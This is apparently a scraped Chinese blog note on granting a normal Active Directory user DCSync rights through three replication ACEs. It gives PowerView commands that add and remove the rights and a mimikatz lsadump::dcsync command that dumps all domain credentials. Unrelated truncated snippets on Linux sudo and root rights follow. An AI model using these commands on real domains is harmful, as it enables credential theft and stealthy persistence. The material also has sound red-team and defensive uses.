dcsync是幾個許可權的集合體,如果普通使用者想具有dcsync許可權,可以給物件新增以下三條ace:
ds-replication-get-changes,對應guid為:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
ds-replication-get-changes-all,對應guid為:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
ds-replication-get-changes-in-filtered-set,對應guid為:89e95b76-444d-4c62-991a-0facbeda640c
powerview
set-executionpolicy bypass -scope process
. .\powerview.ps1
add-domainobjectacl -targetidentity "dc=test,dc=com" -principalidentity zhangsan -rights dcsync -verbose
privilege::debug #可以不用這一句
lsadump::dcsync /all /csv
刪除賬號dcsync許可權:
remove-domainobjectacl -targetidentity "dc=test,dc=com" -principalidentity zhangsan -rights dcsync -verbose賦予普通使用者root許可權
1 新增使用者,首先用adduser命令新增乙個普通使用者,命令如下 adduser tom 新增乙個名為tom的使用者 passwd tom 修改密碼 changing password for user tom.new unix password 在這裡輸入新密碼 retype new unix...
Debian10下賦予普通使用者sudo許可權
為了讓普通使用者擁有一些只有root可以執行的命令,但又不想將root的密碼資訊告訴別人,此時可以使用sudo命令,登入root賬號修改 etc sudoers檔案。1 為sudoers檔案新增寫的許可權 chmod u w sudoers 3 user privilege specificatio...
linux賦予普通使用者root許可權
開始 測試環境 centos 5.5 1 新增使用者,首先用adduser命令新增乙個普通使用者,命令如下 adduser tommy 新增乙個名為tommy的使用者 passwd tommy 修改密碼 changing password for user tommy.new unix passwo...